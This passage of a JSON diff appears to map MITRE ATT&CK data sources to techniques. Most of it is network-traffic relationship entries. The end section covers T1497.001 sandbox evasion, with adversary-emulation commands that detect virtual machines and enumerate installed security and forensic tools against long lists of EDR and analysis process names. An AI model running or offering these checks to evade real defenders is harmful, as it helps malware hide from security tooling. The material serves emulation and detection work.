format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "sensor health", + "definition": "Information associated with sensors providing data about host system status.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "host status", + "description": "Data from a sensor about the health of a host system sensor", + "source_data_element": "sensor health", + "relationship": "contained", + "target_data_element": "host system status" + } + ], + "external_reference": [ + "https://securelist.com/lazarus-under-the-hood/77908/", + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + null + ] + }, + { + "technique_id": "T1497.001", + "command_list": [ + "if (systemd-detect-virt || sudo dmidecode | egrep -i 'manufacturer|product|vendor' | grep -iE 'Oracle|VirtualBox|VMWare|Parallels') then echo \"Virtualization Environment detected\"; fi;\n", + "$error.clear()\nGet-WmiObject -Query \"SELECT * FROM MSAcpi_ThermalZoneTemperature\" -ErrorAction SilentlyContinue\nif($error) {echo \"Virtualization Environment detected\"}\n", + "if (ioreg -l | grep -e Manufacturer -e 'Vendor Name' | grep -iE 'Oracle|VirtualBox|VMWare|Parallels') then echo 'Virtualization Environment detected'; fi;\n", + "$Manufacturer = Get-WmiObject -Class Win32_ComputerSystem | select-object -expandproperty \"Manufacturer\"\n$Model = Get-WmiObject -Class Win32_ComputerSystem | select-object -expandproperty \"Model\"\nif((($Manufacturer.ToLower() -eq \"microsoft corporation\") -and ($Model.ToLower().contains(\"virtual\"))) -or ($Manufacturer.ToLower().contains(\"vmware\")) -or ($Model.ToLower() -eq \"virtualbox\")) {write-host \"Virtualization environment detected!\"} else {write-host \"No virtualization environment detected!\"}\n", + "$securityServices = @(\n \"msmpeng\",\n \"windefend\",\n \"mssense\",\n \"sense\",\n \"microsoft.tri.sensor\",\n \"microsoft.tri.sensor.updater\",\n \"cavp\",\n \"cb\",\n \"carbonblack\",\n \"carbonblackk\",\n \"cbcomms\",\n \"cbstream\",\n \"csfalconservice\",\n \"csfalconcontainer\",\n \"csagent\",\n \"csdevicecontrol\",\n \"csfalconservice\",\n \"xagt\",\n \"xagtnotif\",\n \"fe_avk\",\n \"fekern\",\n \"feelam\",\n \"fewscservice\",\n \"ekrn\",\n \"eguiproxy\",\n \"egui\",\n \"eamonm\",\n \"eelam\",\n \"ehdrv\",\n \"ekrnepfw\",\n \"epfwwfp\",\n \"ekbdflt\",\n \"epfw\",\n \"fsgk32st\",\n \"fswebuid\",\n \"fsgk32\",\n \"fsma32\",\n \"fssm32\",\n \"fnrb32\",\n \"fsaua\",\n \"fsorsp\",\n \"fsav32\",\n \"f-secure gatekeeper handler starter\",\n \"f-secure network request broker\",\n \"f-secure webui daemon\",\n \"fsma\",\n \"fsorspclient\",\n \"f-secure gatekeeper\",\n \"f-secure hips\",\n \"fsbts\",\n \"fsni\",\n \"fsvista\",\n \"f-secure filter\",\n \"f-secure recognizer\",\n \"fses\",\n \"fsfw\",\n \"fsdfw\",\n \"fsms\",\n \"fsdevcon\"\n);\n\n$currentServices = Get-Service | Select-Object -Property Name;\nforeach ($svc in $currentServices) {\n foreach ($secSvc in $securityServices) {\n if ($svc.Name -like $secSvc) {\n $svcDetails = Get-Service -name $svc.Name | Select-Object -Property Name, DisplayName, Status;\n Write-Host \"[!] Security service found:\";\n Write-Host \" Service Name:`t\", $svcDetails.Name;\n Write-Host \" Display Name:`t\", $svcDetails.DisplayName;\n Write-Host \" Status:`t`t\", $svcDetails.Status;\n Write-Host \"\";\n }\n }\n}\n", + "$forensicProcesses = @(\n \"apimonitor-x64\",\n \"apimonitor-x86\",\n \"autopsy64\",\n \"autopsy\",\n \"autoruns64\",\n \"autoruns\",\n \"autorunsc64\",\n \"autorunsc\",\n \"binaryninja\",\n \"blacklight\",\n \"cff explorer\",\n \"cutter\",\n \"de4dot\",\n \"debugview\",\n \"diskmon\",\n \"dnsd\",\n \"dnspy\",\n \"dotpeek32\",\n \"dotpeek64\",\n \"dumpcap\",\n \"evidence center\",\n \"exeinfope\",\n \"fakedns\",\n \"fakenet\",\n \"ffdec\",\n \"fiddler\",\n \"fileinsight\",\n \"floss\",\n \"gdb\",\n \"hiew32demo\",\n \"hiew32\",\n \"hollows_hunter\",\n \"idaq64\",\n \"idaq\",\n \"idr\",\n \"ildasm\",\n \"ilspy\",\n \"jd-gui\",\n \"lordpe\",\n \"officemalscanner\",\n \"ollydbg\",\n \"pdfstreamdumper\",\n \"pe-bear\",\n \"pebrowse64\",\n \"peid\",\n \"pe-sieve32\",\n \"pe-sieve64\",\n \"pestudio\",\n \"peview\",\n \"ppee\",\n \"procdump64\",\n \"procdump\",\n \"processhacker\",\n \"procexp64\",\n \"procexp\",\n \"procmon\",\n \"prodiscoverbasic\",\n \"py2exedecompiler\",\n \"r2agent\",\n \"rabin2\",\n \"radare2\",\n \"ramcapture64\",\n \"ramcapture\",\n \"reflector\",\n \"regmon\",\n \"resourcehacker\",\n \"retdec-ar-extractor\",\n \"retdec-bin2llvmir\",\n \"retdec-bin2pat\",\n \"retdec-config\",\n \"retdec-fileinfo\",\n \"retdec-getsig\",\n \"retdec-idr2pat\",\n \"retdec-llvmir2hll\",\n \"retdec-macho-extractor\",\n \"retdec-pat2yara\",\n \"retdec-stacofin\",\n \"retdec-unpacker\",\n \"retdec-yarac\",\n \"rundotnetdll\",\n \"sbiesvc\",\n \"scdbg\",\n \"scylla_x64\",\n \"scylla_x86\",\n \"shellcode_launcher\",\n \"solarwindsdiagnostics\",\n \"sysmon64\",\n \"sysmon\",\n \"task explorer\",\n \"task explorer-x64\",\n \"tcpdump\",\n \"tcpvcon\",\n \"tcpview\",\n \"vboxservice\",\n \"win32_remote\",\n \"win64_remotex64\",\n \"windbg\",\n \"windump\",\n \"winhex64\",\n \"winhex\",\n \"winobj\",\n \"wireshark\",\n \"x32dbg\",\n \"x64dbg\",\n \"xwforensics64\",\n \"xwforensics\",\n \"redcloak\",\n \"avgsvc\",\n \"avgui\",\n \"avgsvca\",\n \"avgidsagent\",\n \"avgsvcx\",\n \"avgwdsvcx\",\n \"avgadminclientservice\",\n \"afwserv\",\n \"avastui\",\n \"avastsvc\",\n \"aswidsagent\",\n \"aswidsagenta\",\n \"aswengsrv\",\n \"avastavwrapper\",\n \"bccavsvc\",\n \"psanhost\",\n \"psuaservice\",\n \"psuamain\",\n \"avp\",\n \"avpui\",\n \"ksde\",\n \"ksdeui\",\n \"tanium\",\n \"taniumclient\",\n \"taniumdetectengine\",\n \"taniumendpointindex\",\n \"taniumtracecli\",\n \"taniumtracewebsocketclient64\"\n);\n\nfunction Find-ForensicProcesses {\n param (\n $ForensicProcessList\n );\n $CurrentProcesses = Get-Process | Sort-Object | Select-Object -Property Name | Get-Unique -AsString;\n foreach ($proc in $CurrentProcesses) {\n foreach ($forensicProc in $ForensicProcessList) {\n if ($proc.name -like $forensicProc) {\n $procPath = Get-Process -Name $proc.Name | Sort-Object | Select-Object -Property Path | Get-Unique;\n Write-Host \"[!] Forensic process found: \" $proc.Name;\n Write-Host \"[!] Path: \" $procPath.Path;\n }\n }\n }\n}\n\nFind-ForensicProcesses($forensicProcesses);", + "get-wmiobject win32_computersystem | fl model\n" + ], + "commands": [ + { + "command": "if (systemd-detect-virt || sudo dmidecode | egrep -i 'manufacturer|product|vendor' | grep -iE 'Oracle|VirtualBox|VMWare|Parallels') then echo \"Virtualization Environment detected\"; fi;\n", + "source": "atomics/T1497.001/T1497.001.yaml", + "name": "Atomic Red Team Test - Virtualization/Sandbox Evasion: System Checks" + }, + { + "command": "$error.clear()\nGet-WmiObject -Query \"SELECT * FROM MSAcpi_ThermalZoneTemperature\" -ErrorAction SilentlyContinue\nif($error) {echo \"Virtualization Environment detected\"}\n", + "source": "atomics/T1497.001/T1497.001.yaml", + "name": "Atomic Red Team Test - Virtualization/Sandbox Evasion: System Checks" + }, + { + "command": "if (ioreg -l | grep -e Manufacturer -e 'Vendor Name' | grep -iE 'Oracle|VirtualBox|VMWare|Parallels') then echo 'Virtualization Environment detected'; fi;\n", + "source": "atomics/T1497.001/T1497.001.yaml", + "name": "Atomic Red Team Test - Virtualization/Sandbox Evasion: System Checks" + }, + { + "command": "$Manufacturer = Get-WmiObject -Class Win32_ComputerSystem | select-object -expandproperty \"Manufacturer\"\n$Model = Get-WmiObject -Class Win32_ComputerSystem | select-object -expandproperty \"Model\"\nif((($Manufacturer.ToLower() -eq \"microsoft corporation\") -and ($Model.ToLower().contains(\"virtual\"))) -or ($Manufacturer.ToLower().contains(\"vmware\")) -or ($Model.ToLower() -eq \"virtualbox\")) {write-host \"Virtualization environment detected!\"} else {write-host \"No virtualization environment detected!\"}\n", + "source": "atomics/T1497.001/T1497.001.yaml", + "name": "Atomic Red Team Test - Virtualization/Sandbox Evasion: System Checks" + }, + { + "command": "$securityServices = @(\n \"msmpeng\",\n \"windefend\",\n \"mssense\",\n \"sense\",\n \"microsoft.tri.sensor\",\n \"microsoft.tri.sensor.updater\",\n \"cavp\",\n \"cb\",\n \"carbonblack\",\n \"carbonblackk\",\n \"cbcomms\",\n \"cbstream\",\n \"csfalconservice\",\n \"csfalconcontainer\",\n \"csagent\",\n \"csdevicecontrol\",\n \"csfalconservice\",\n \"xagt\",\n \"xagtnotif\",\n \"fe_avk\",\n \"fekern\",\n \"feelam\",\n \"fewscservice\",\n \"ekrn\",\n \"eguiproxy\",\n \"egui\",\n \"eamonm\",\n \"eelam\",\n \"ehdrv\",\n \"ekrnepfw\",\n \"epfwwfp\",\n \"ekbdflt\",\n \"epfw\",\n \"fsgk32st\",\n \"fswebuid\",\n \"fsgk32\",\n \"fsma32\",\n \"fssm32\",\n \"fnrb32\",\n \"fsaua\",\n \"fsorsp\",\n \"fsav32\",\n \"f-secure gatekeeper handler starter\",\n \"f-secure network request broker\",\n \"f-secure webui daemon\",\n \"fsma\",\n \"fsorspclient\",\n \"f-secure gatekeeper\",\n \"f-secure hips\",\n \"fsbts\",\n \"fsni\",\n \"fsvista\",\n \"f-secure filter\",\n \"f-secure recognizer\",\n \"fses\",\n \"fsfw\",\n \"fsdfw\",\n \"fsms\",\n \"fsdevcon\"\n);\n\n$currentServices = Get-Service | Select-Object -Property Name;\nforeach ($svc in $currentServices) {\n foreach ($secSvc in $securityServices) {\n if ($svc.Name -like $secSvc) {\n $svcDetails = Get-Service -name $svc.Name | Select-Object -Property Name, DisplayName, Status;\n Write-Host \"[!] Security service found:\";\n Write-Host \" Service Name:`t\", $svcDetails.Name;\n Write-Host \" Display Name:`t\", $svcDetails.DisplayName;\n Write-Host \" Status:`t`t\", $svcDetails.Status;\n Write-Host \"\";\n }\n }\n}\n", + "source": "data/abilities/defense-evasion/1258b063-27d6-489b-a677-4807faacf868.yml", + "name": "Check for security services. Security service list is based on the SUNBURST malware observed in a Solarwinds related compromise (https://research.checkpoint.com/2020/sunburst-teardrop-and-the-netsec-new-normal/)." + }, + { + "command": "$forensicProcesses = @(\n \"apimonitor-x64\",\n \"apimonitor-x86\",\n \"autopsy64\",\n \"autopsy\",\n \"autoruns64\",\n \"autoruns\",\n \"autorunsc64\",\n \"autorunsc\",\n \"binaryninja\",\n \"blacklight\",\n \"cff explorer\",\n \"cutter\",\n \"de4dot\",\n \"debugview\",\n 